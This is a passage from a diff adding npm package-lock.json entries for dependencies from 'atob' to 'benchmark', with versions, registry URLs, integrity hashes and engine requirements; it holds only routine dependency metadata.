"sha512-+q/t7Ekv1EDY2l6Gda6LLiX14rU9TV20Wa3ofeQmwPFZbOMo9DXrLbOjFaaclkXKWidIaopwAObQDqwWtGUjqg==", + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/atob": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/atob/-/atob-2.1.2.tgz", + "integrity": "sha512-Wm6ukoaOGJi/73p/cl2GvLjTI5JM1k/O14isD73YML8StrH/7/lRFgmg8nICZgD3bZZvjwCGxtMOD3wWNAu8cg==", + "dev": true, + "bin": { + "atob": "bin/atob.js" + }, + "engines": { + "node": ">= 4.5.0" + } + }, + "node_modules/auth0-id-generator": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/auth0-id-generator/-/auth0-id-generator-0.2.0.tgz", + "integrity": "sha512-sJVZrGls/XB7TEsAovv6GsGwsjDBhBy014w+9x/DNZH8OTV8F/uioMmT68ADWtfbvfkJaNCYNjRs1dOVFyNqbQ==" + }, + "node_modules/autoprefixer": { + "version": "10.4.16", + "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.4.16.tgz", + "integrity": "sha512-7vd3UC6xKp0HLfua5IjZlcXvGAGy7cBAXTg2lyQ/8WpNhd6SiZ8Be+xm3FyBSYJx5GKcpRCzBh7RH4/0dnY+uQ==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/autoprefixer" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "browserslist": "^4.21.10", + "caniuse-lite": "^1.0.30001538", + "fraction.js": "^4.3.6", + "normalize-range": "^0.1.2", + "picocolors": "^1.0.0", + "postcss-value-parser": "^4.2.0" + }, + "bin": { + 
"autoprefixer": "bin/autoprefixer" + }, + "engines": { + "node": "^10 || ^12 || >=14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/available-typed-arrays": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/available-typed-arrays/-/available-typed-arrays-1.0.7.tgz", + "integrity": "sha512-wvUjBtSGN7+7SjNpq/9M2Tg350UZD3q62IFZLbRAR1bSMlCo1ZaeW+BJ+D090e4hIIZLBcTDWe4Mh4jvUDajzQ==", + "license": "MIT", + "dependencies": { + "possible-typed-array-names": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/aws-sdk": { + "version": "2.1358.0", + "resolved": "https://registry.npmjs.org/aws-sdk/-/aws-sdk-2.1358.0.tgz", + "integrity": "sha512-ZolqFlnm0mDNgub7FGrVi7r5A1rw+58zZziKhlis3IxOtIpHdx4BQU5pH4htAMuD0Ct557p/dC/wmnZH/1Rc9Q==", + "dependencies": { + "buffer": "4.9.2", + "events": "1.1.1", + "ieee754": "1.1.13", + "jmespath": "0.16.0", + "querystring": "0.2.0", + "sax": "1.2.1", + "url": "0.10.3", + "util": "^0.12.4", + "uuid": "8.0.0", + "xml2js": "0.5.0" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/aws-sdk/node_modules/uuid": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.0.0.tgz", + "integrity": "sha512-jOXGuXZAWdsTH7eZLtyXMqUb9EcWMGZNbL9YcGBJl4MH4nrxHmZJhEHvyLFrkxo+28uLb/NYRcStH48fnD0Vzw==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/aws-sdk/node_modules/xml2js": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.5.0.tgz", + "integrity": "sha512-drPFnkQJik/O+uPKpqSgr22mpuFHqKdbS835iAQrUC73L2F5WkboIRd63ai/2Yg6I1jzifPFKH2NTK+cfglkIA==", + "dependencies": { + "sax": ">=0.6.0", + "xmlbuilder": "~11.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/aws-sdk/node_modules/xmlbuilder": { + "version": "11.0.1", + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-11.0.1.tgz", + "integrity": "sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/aws-sign2": { + "version": "0.7.0", + "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", + "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", + "engines": { + "node": "*" + } + }, + "node_modules/aws4": { + "version": "1.11.0", + "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", + "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" + }, + "node_modules/axe-core": { + "version": "4.7.1", + "resolved": "https://registry.npmjs.org/axe-core/-/axe-core-4.7.1.tgz", + "integrity": "sha512-sCXXUhA+cljomZ3ZAwb8i1p3oOlkABzPy08ZDAoGcYuvtBPlQ1Ytde129ArXyHWDhfeewq7rlx9F+cUx2SSlkg==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/axios": { + "version": "1.8.4", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.8.4.tgz", + "integrity": "sha512-eBSYY4Y68NNlHbHBMdeDmKNtDgXWhQsJcGqzO3iLUM0GraQFSS9cVgPX5I9b3lbdFKyYoAEGAZF1DwhTaljNAw==", + "license": "MIT", + "dependencies": { + "follow-redirects": "^1.15.6", + "form-data": "^4.0.0", + "proxy-from-env": "^1.1.0" + } + }, + "node_modules/axios/node_modules/proxy-from-env": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", + "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" + }, + "node_modules/axobject-query": { + 
"version": "3.1.1", + "resolved": "https://registry.npmjs.org/axobject-query/-/axobject-query-3.1.1.tgz", + "integrity": "sha512-goKlv8DZrK9hUh975fnHzhNIO4jUnFCfv/dszV5VwUGDFjI6vQ2VwoyjYjYNEbBE8AH87TduWP5uyDR1D+Iteg==", + "dev": true, + "dependencies": { + "deep-equal": "^2.0.5" + } + }, + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "license": "Apache-2.0" + }, + "node_modules/babel-core": { + "version": "7.0.0-bridge.0", + "resolved": "https://registry.npmjs.org/babel-core/-/babel-core-7.0.0-bridge.0.tgz", + "integrity": "sha512-poPX9mZH/5CSanm50Q+1toVci6pv5KSRv/5TWCwtzQS5XEwn40BcCrgIeMFWP9CKKIniKXNxoIOnOq4VVlGXhg==", + "dev": true, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/babel-loader": { + "version": "9.2.1", + "resolved": "https://registry.npmjs.org/babel-loader/-/babel-loader-9.2.1.tgz", + "integrity": "sha512-fqe8naHt46e0yIdkjUZYqddSXfej3AHajX+CSO5X7oy0EmPc6o5Xh+RClNoHjnieWz9AW4kZxW9yyFMhVB1QLA==", + "dev": true, + "license": "MIT", + "dependencies": { + "find-cache-dir": "^4.0.0", + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 14.15.0" + }, + "peerDependencies": { + "@babel/core": "^7.12.0", + "webpack": ">=5" + } + }, + "node_modules/babel-loader/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/babel-loader/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/babel-loader/node_modules/find-cache-dir": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/find-cache-dir/-/find-cache-dir-4.0.0.tgz", + "integrity": "sha512-9ZonPT4ZAK4a+1pUPVPZJapbi7O5qbbJPdYw/NOQWZZbVLdDTYM3A4R9z/DpAM08IDaFGsvPgiGZ82WEwUDWjg==", + "dev": true, + "dependencies": { + "common-path-prefix": "^3.0.0", + "pkg-dir": "^7.0.0" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/find-up": { + "version": "6.3.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-6.3.0.tgz", + "integrity": "sha512-v2ZsoEuVHYy8ZIlYqwPe/39Cy+cFDzp4dXPaxNvkEuouymu+2Jbz0PxpKarJHYJTmv2HWT3O382qY8l4jMWthw==", + "dev": true, + "dependencies": { + "locate-path": "^7.1.0", + "path-exists": "^5.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": 
"sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/babel-loader/node_modules/locate-path": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-7.2.0.tgz", + "integrity": "sha512-gvVijfZvn7R+2qyPX8mAuKcFGDf6Nc61GdvGafQsHL0sBIxfKzA+usWn4GFC/bk+QdwPUD4kWFJLhElipq+0VA==", + "dev": true, + "dependencies": { + "p-locate": "^6.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/p-limit": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-4.0.0.tgz", + "integrity": "sha512-5b0R4txpzjPWVw/cXXUResoD4hb6U/x9BH08L7nw+GN1sezDzPdxeRvpc9c433fZhBan/wusjbCsqwqm4EIBIQ==", + "dev": true, + "dependencies": { + "yocto-queue": "^1.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/p-locate": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-6.0.0.tgz", + "integrity": "sha512-wPrq66Llhl7/4AGC6I+cqxT07LhXvWL08LNXz1fENOw0Ap4sRZZ/gZpTTJ5jpurzzzfS2W/Ge9BY3LgLjCShcw==", + "dev": true, + "dependencies": { + "p-limit": "^4.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/path-exists": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-5.0.0.tgz", + "integrity": "sha512-RjhtfwJOxzcFmNOi6ltcbcu4Iu+FL3zEj83dk4kAS+fVpTxXLO1b38RvJgT/0QwvV/L3aY9TAnyv0EOqW4GoMQ==", + "dev": true, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + } + }, + "node_modules/babel-loader/node_modules/pkg-dir": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-7.0.0.tgz", + "integrity": "sha512-Ie9z/WINcxxLp27BKOCHGde4ITq9UklYKDzVo1nhk5sqGEXU3FpkwP5GM2voTGJkGd9B3Otl+Q4uwSOeSUtOBA==", + "dev": true, + "dependencies": { + "find-up": "^6.3.0" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/schema-utils": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.0.1.tgz", + "integrity": "sha512-lELhBAAly9NowEsX0yZBlw9ahZG+sK/1RJ21EpzdYHKEs13Vku3LJ+MIPhh4sMs0oCCeufZQEQbMekiA4vuVIQ==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/babel-loader/node_modules/yocto-queue": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-1.0.0.tgz", + "integrity": "sha512-9bnSc/HEW2uRy67wc+T8UwauLuPJVn28jb+GtJY16iiKWyvmYJRXVT4UamsAEGQfPohgr2q4Tq0sQbQlxTfi1g==", + "dev": true, + "engines": { + "node": ">=12.20" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-plugin-macros": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/babel-plugin-macros/-/babel-plugin-macros-3.1.0.tgz", + "integrity": 
"sha512-Cg7TFGpIr01vOQNODXOOaGz2NpCU5gl8x1qJFbb6hbZxR7XrcE2vtbAsTAbJ7/xwJtUuJEw8K8Zr/AE0LHlesg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5", + "cosmiconfig": "^7.0.0", + "resolve": "^1.19.0" + }, + "engines": { + "node": ">=10", + "npm": ">=6" + } + }, + "node_modules/babel-plugin-module-resolver": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/babel-plugin-module-resolver/-/babel-plugin-module-resolver-5.0.2.tgz", + "integrity": "sha512-9KtaCazHee2xc0ibfqsDeamwDps6FZNo5S0Q81dUqEuFzVwPhcT4J5jOqIVvgCA3Q/wO9hKYxN/Ds3tIsp5ygg==", + "dev": true, + "dependencies": { + "find-babel-config": "^2.1.1", + "glob": "^9.3.3", + "pkg-up": "^3.1.0", + "reselect": "^4.1.7", + "resolve": "^1.22.8" + } + }, + "node_modules/babel-plugin-module-resolver/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/babel-plugin-module-resolver/node_modules/glob": { + "version": "9.3.5", + "resolved": "https://registry.npmjs.org/glob/-/glob-9.3.5.tgz", + "integrity": "sha512-e1LleDykUz2Iu+MTYdkSsuWX8lvAjAcs0Xef0lNIu0S2wOAzuTxCJtcd9S3cijlwYF18EsU3rzb8jPVobxDh9Q==", + "dev": true, + "dependencies": { + "fs.realpath": "^1.0.0", + "minimatch": "^8.0.2", + "minipass": "^4.2.4", + "path-scurry": "^1.6.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/babel-plugin-module-resolver/node_modules/minimatch": { + "version": "8.0.4", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-8.0.4.tgz", + "integrity": "sha512-W0Wvr9HyFXZRGIDgCicunpQ299OKXs9RgZfaukz4qAW/pJhcpUfupc9c+OObPOFueNy8VSrZgEmDtk6Kh4WzDA==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/babel-plugin-module-resolver/node_modules/minipass": { + "version": "4.2.8", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-4.2.8.tgz", + "integrity": "sha512-fNzuVyifolSLFL4NzpF+wEF4qrgqaaKX0haXPQEdQ7NKAN+WecoKMHV09YcuL/DHxrUsYQOK3MiuDf7Ip2OXfQ==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/babel-plugin-polyfill-corejs2": { + "version": "0.4.11", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-corejs2/-/babel-plugin-polyfill-corejs2-0.4.11.tgz", + "integrity": "sha512-sMEJ27L0gRHShOh5G54uAAPaiCOygY/5ratXuiyb2G46FmlSpc9eFCzYVyDiPxfNbwzA7mYahmjQc5q+CZQ09Q==", + "dev": true, + "dependencies": { + "@babel/compat-data": "^7.22.6", + "@babel/helper-define-polyfill-provider": "^0.6.2", + "semver": "^6.3.1" + }, + "peerDependencies": { + "@babel/core": "^7.4.0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/babel-plugin-polyfill-corejs3": { + "version": "0.10.4", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-corejs3/-/babel-plugin-polyfill-corejs3-0.10.4.tgz", + "integrity": "sha512-25J6I8NGfa5YkCDogHRID3fVCadIR8/pGl1/spvCkzb6lVn6SR3ojpx9nOn9iEBcUsjY24AmdKm5khcfKdylcg==", + "dev": true, + "dependencies": { + "@babel/helper-define-polyfill-provider": "^0.6.1", + "core-js-compat": "^3.36.1" + }, + "peerDependencies": { + "@babel/core": "^7.4.0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/babel-plugin-polyfill-regenerator": { + 
"version": "0.6.2", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-regenerator/-/babel-plugin-polyfill-regenerator-0.6.2.tgz", + "integrity": "sha512-2R25rQZWP63nGwaAswvDazbPXfrM3HwVoBXK6HcqeKrSrL/JqcC/rDcf95l4r7LXLyxDXc8uQDa064GubtCABg==", + "dev": true, + "dependencies": { + "@babel/helper-define-polyfill-provider": "^0.6.2" + }, + "peerDependencies": { + "@babel/core": "^7.4.0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/babel-plugin-react-transform": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/babel-plugin-react-transform/-/babel-plugin-react-transform-2.0.2.tgz", + "integrity": "sha512-y/e6c6xTp5vNAOWJ628872w0ntFbiM4baNSvubOE4xWIEeI8J3npUz0I1DVbzcjijtyket2WRXSqCFYoI3ENZQ==", + "dev": true, + "dependencies": { + "lodash": "^4.6.1" + } + }, + "node_modules/babel-plugin-transform-react-remove-prop-types": { + "version": "0.3.3", + "resolved": "https://registry.npmjs.org/babel-plugin-transform-react-remove-prop-types/-/babel-plugin-transform-react-remove-prop-types-0.3.3.tgz", + "integrity": "sha512-JTASijWmnc92y7uqEH17cb092qois29MkLzaRU3fYAhV88aANm7R+SEkdcXt1kxMaX7x1Lh1OWbyexKtHNi3OQ==", + "dev": true + }, + "node_modules/babel-walk": { + "version": "3.0.0-canary-5", + "resolved": "https://registry.npmjs.org/babel-walk/-/babel-walk-3.0.0-canary-5.tgz", + "integrity": "sha512-GAwkz0AihzY5bkwIY5QDR+LvsRQgB/B+1foMPvi0FZPMl5fjD7ICiznUiBdLYMH1QYe6vqu4gWYytZOccLouFw==", + "dependencies": { + "@babel/types": "^7.9.6" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/backbone": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/backbone/-/backbone-1.6.0.tgz", + "integrity": "sha512-13PUjmsgw/49EowNcQvfG4gmczz1ximTMhUktj0Jfrjth0MVaTxehpU+qYYX4MxnuIuhmvBLC6/ayxuAGnOhbA==", + "dev": true, + "dependencies": { + "underscore": ">=1.8.3" + } + }, + "node_modules/backoff": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/backoff/-/backoff-2.5.0.tgz", + "integrity": "sha1-9hbtqdPktmuMp/ynn2lXIsX44m8=", + "dependencies": { + "precond": "0.2" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/balanced-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + }, + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "license": "Apache-2.0", + "optional": true + }, + "node_modules/bare-fs": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.0.1.tgz", + "integrity": "sha512-ilQs4fm/l9eMfWY2dY0WCIUplSUp7U0CT1vrqMg1MUdeZl4fypu5UP0XcDBK5WBQPJAKP1b7XEodISmekH/CEg==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-events": "^2.0.0", + "bare-path": "^3.0.0", + "bare-stream": "^2.0.0" + }, + "engines": { + "bare": ">=1.7.0" + } + }, + "node_modules/bare-os": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.0.tgz", + "integrity": "sha512-BUrFS5TqSBdA0LwHop4OjPJwisqxGy6JsWVqV6qaFoe965qqtaKfDzHY5T2YA1gUL0ZeeQeA+4BBc1FJTcHiPw==", + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" + } + }, + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + 
"integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-os": "^3.0.1" + } + }, + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "streamx": "^2.21.0" + }, + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } + } + }, + "node_modules/base": { + "version": "0.11.2", + "resolved": "https://registry.npmjs.org/base/-/base-0.11.2.tgz", + "integrity": "sha512-5T6P4xPgpp0YDFvSWwEZ4NoE3aM4QBQXDzmVbraCkFj8zHM+mba8SyqB5DbZWyR7mYHo6Y7BdQo3MoA4m0TeQg==", + "dev": true, + "dependencies": { + "cache-base": "^1.0.1", + "class-utils": "^0.3.5", + "component-emitter": "^1.2.1", + "define-property": "^1.0.0", + "isobject": "^3.0.1", + "mixin-deep": "^1.2.0", + "pascalcase": "^0.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/base-x": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/base-x/-/base-x-4.0.0.tgz", + "integrity": "sha512-FuwxlW4H5kh37X/oW59pwTzzTKRzfrrQwhmyspRM7swOEZcHtDZSCt45U6oKgtuFE+WYPblePMVIPR4RZrh/hw==" + }, + "node_modules/base/node_modules/define-property": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-1.0.0.tgz", + "integrity": "sha512-cZTYKFWspt9jZsMscWo8sc/5lbPC9Q0N5nBLgb+Yd915iL3udB1uFgS3B8YCx66UVHq018DAVFoee7x+gxggeA==", + "dev": true, + "dependencies": { + "is-descriptor": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/base64-stream": { + "version": "0.1.5", + "resolved": "https://registry.npmjs.org/base64-stream/-/base64-stream-0.1.5.tgz", + "integrity": "sha512-j3OFbLDb8Wy0SM7HrP1zj8ADVHqaKoL8VNrDnd7wedkoz5onf9le2DgOsCdmg8QQPnUPXd7LLCjGnYAk/YDBFg==", + "dependencies": { + "readable-stream": "^2.0.2" + } + }, + "node_modules/base64-stream/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/base64-stream/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/base64-stream/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": 
"https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/base64id": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/base64id/-/base64id-0.1.0.tgz", + "integrity": "sha1-As4P3u4M709ACA4ec+g08LG/zj8=", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/base64url": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/base64url/-/base64url-3.0.1.tgz", + "integrity": "sha512-ir1UPr3dkwexU7FdV8qBBbNDRUhMmIekYMFZfi+C/sLNnRESKPl23nB9b2pltqfOQNnGzsDdId90AEtG5tCx4A==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/basic-auth": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz", + "integrity": "sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==", + "dependencies": { + "safe-buffer": "5.1.2" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/batch": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/batch/-/batch-0.6.1.tgz", + "integrity": "sha512-x+VAiMRL6UPkx+kudNvxTl6hB2XNNCG2r+7wixVfIYwu/2HKRXimwQyaumLjMveWvT2Hkd/cAJw+QBMfJ/EKVw==", + "dev": true, + "license": "MIT" + }, + "node_modules/bcrypt": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/bcrypt/-/bcrypt-5.0.1.tgz", + "integrity": "sha512-9BTgmrhZM2t1bNuDtrtIMVSmmxZBrJ71n8Wg+YgdjHuIWYF7SjjmCPZFB+/5i/o/PIeRpwVJR3P+NrpIItUjqw==", + "hasInstallScript": true, + "dependencies": { + "@mapbox/node-pre-gyp": "^1.0.0", + "node-addon-api": "^3.1.0" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/bcrypt-pbkdf": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", + "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", + "dependencies": { + "tweetnacl": "^0.14.3" + } + }, + "node_modules/bcryptjs": { + "version": "2.4.3", + "resolved": "https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz", + "integrity": "sha1-mrVie5PmBiH/fNrF2pczAn3x0Ms=" + }, + "node_modules/benchmark": { + "version": "2.1.4", + "resolved": 